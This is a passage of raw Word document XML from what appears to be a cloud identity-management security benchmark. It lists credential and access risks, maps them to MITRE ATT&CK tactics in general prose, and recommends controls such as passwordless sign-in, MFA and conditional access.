      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Exposure in Code or Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E4E2F7" w14:textId="5DAA1D14" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Hard-coded credentials in source code or configuration files are exposed via misconfigurations or insider errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10194AF0" w14:textId="1C9696BA" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized Access from Compromised Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717705F" w14:textId="761FFC89" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Compromised accounts provide attackers broad access to applications and resources due to insufficient behavioral monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA5F30" w14:textId="3008EBDD" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Account Proliferation and Orphaned Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6052CC" w14:textId="6626B510" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Duplicate or abandoned accounts (e.g., for former employees) are exploited by attackers or misused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0919D54C" w14:textId="19CF52C1" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Inconsistent Security Policies Across Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D4E75" w14:textId="6053B21A" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Varying security controls (e.g., lack of MFA) across apps create exploitable vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A49CD65" w14:textId="779E7B00" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Man-in-the-Middle (MitM) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5077D18B" w14:textId="4E3F758D" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Attackers intercept authentication sessions to steal credentials or tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74561E" w14:textId="7D748D78" w:rsidR="00333773" w:rsidRPr="00E53977" w:rsidRDefault="00333773" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insider Threats from Over-Privileged Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB9CD1" w14:textId="23FA7608" w:rsidR="00333773" w:rsidRPr="00E53977" w:rsidRDefault="00333773" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Excessive permissions allow intentional or accidental misuse by employees or partners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CEC676" w14:textId="5DA5D7C5" w:rsidR="001420DF" w:rsidRPr="00E53977" w:rsidRDefault="001420DF" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized External Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54547133" w14:textId="143B723E" w:rsidR="001420DF" w:rsidRPr="00E53977" w:rsidRDefault="001420DF" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Poorly managed external identities (e.g., partners, customers) gain unintended access to sensitive systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123CEED" w14:textId="22568DA5" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D0DB4" w14:textId="5FB7993C" w:rsidR="00515B66" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EE07E" w14:textId="563B673E" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>extracting plaintext credentials (e.g., API keys, passwords) embedded in source code or configuration files (e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>, .env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>, JSON) from misconfigured repositories or CI/CD pipelines, using harvested credentials to authenticate to cloud or on-premises service APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70607DA9" w14:textId="4CD2E3A6" w:rsidR="00515B66" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C4516" w14:textId="372FD796" w:rsidR="001F7CBB" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>capturing credentials via spear-phishing (e.g., fake app-specific login pages, T1566.001) or intercept unencrypted traffic to disparate login endpoints, exploiting inconsistent TLS configurations to acquire credentials for multiple systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDBB00" w14:textId="032CDE56" w:rsidR="00515B66" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71157B" w14:textId="23D75553" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>exploiting weak or reused credentials across uncoordinated apps, leveraging brute-force attacks (e.g., password spraying via app login APIs, T1110.001) or credential stuffing to gain unauthorized access to cloud services, SaaS, or on-premises resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7790076D" w14:textId="55D2A2E5" w:rsidR="00515B66" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046C6BA" w14:textId="06F880C3" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>maintaining access by exploiting unmanaged accounts in individual app databases, embedding credentials in configurations (T1098.001) to repeatedly authenticate to siloed systems without centralized revocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5848A9BA" w14:textId="3A16D32A" w:rsidR="00515B66" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1472C041" w14:textId="26F5311C" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>using stolen credentials to generate API or app requests mimicking legitimate traffic across disparate systems, evading detection (T1036) due to fragmented audit logging or lack of centralized telemetry.</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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement strong authentication controls using the following methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE21291" w14:textId="3B6223AF" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>passwordless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE2E90" w14:textId="6218DEB5" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>passwordless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> authentication as your default method with four available options: Windows Hello for Business, Microsoft Authenticator app phone sign-in, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>passkeys(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">FIDO2), and certificate-based authentication. Microsoft Entra ID supports </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>passwordless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> authentication natively. In addition, customers can use on-premises authentication methods such as smart cards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A222C5D" w14:textId="129B59CB" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A571997" w14:textId="4A080964" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable Azure MFA which can be enforced on all users, select users, or at the per-user level based on sign-in conditions and risk factors. Follow Microsoft Defender for Cloud identity and access management recommendations for your MFA setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317EF6F" w14:textId="1857311B" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Maintain password security for legacy scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415FAA69" w14:textId="64082B1E" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>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1" w:name="_Toc242449484"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-7: Restrict resource access based on conditions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="62FD8A69" w14:textId="7A74E2B7" w:rsidR="00515B66" w:rsidRDefault="00515B66" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E1AA8" w14:textId="24B93E87" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>Explicitly validate trusted signals to allow or deny user access to resources, as part of a zero-trust access model. Signals to validate should include strong authentication of user account, behavioral analytics of user account, device trustworthiness, user or group membership, locations and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38787B15" w14:textId="53FEECC8" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1273B656" w14:textId="05DB916C" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation from Over-Privileged Credentials or Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1057B752" w14:textId="28A7774F" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized Access via Stolen Broad-Scope Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5947AEEF" w14:textId="7EFF3077" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Adversaries use stolen credentials from poorly managed access systems, acquired through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> or misconfigured public-facing endpoints, to authenticate to cloud services via API keys or passwords that lack granular, resource-specific restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764B3E9A" w14:textId="43CC9D1B" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistent Access through Unmanaged or Excessive Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D5923" w14:textId="3F4EE7A7" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Adversaries create or modify unmanaged accounts with broad permissions, embedding static credentials in cloud configurations (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> templates) to maintain persistent access through repeated API authentications without centralized permission revocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E26DC" w14:textId="063CF445" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Detection Evasion with Broadly Scoped Credential Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084252F4" w14:textId="48F5482A" w:rsidR="00C36EA4" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Adversaries leverage broadly scoped credentials to generate API requests that mimic legitimate cloud traffic, evading detection due to the absence of role-specific audit trails or granular monitoring in coarse access control systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECB703" w14:textId="62B5075A" w:rsidR="00666F55" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized Data or Credential Harvesting from Overly Accessible Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C72CF7B" w14:textId="6C51695F" w:rsidR="00515B66" w:rsidRPr="00E53977" w:rsidRDefault="00515B66" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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335CE327" w14:textId="314017B6" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F534138" w14:textId="67F63290" w:rsidR="00C70314" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EADDF7D" w14:textId="240E7098" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">exploiting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>over-privileged</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F7CBB">
        <w:t xml:space="preserve"> shared credentials or user accounts with broad access scopes, abusing permissive access controls to invoke high-privilege cloud API operations (e.g., resource creation, policy modification) across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4D2EF" w14:textId="13C47628" w:rsidR="00C70314" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC4B954" w14:textId="3EC73174" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>leveraging stolen credentials from coarsely managed access systems, using spear-phishing or misconfigured public-facing endpoints to authenticate via API keys or passwords lacking granular restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4F4B9" w14:textId="71D7402D" w:rsidR="00C70314" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72700A11" w14:textId="0D9C9069" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>maintaining access by creating or modifying unmanaged accounts with excessive permissions, embedding credentials in cloud configurations to repeatedly authenticate without role-based revocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DECC35" w14:textId="1460A0A3" w:rsidR="00C70314" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
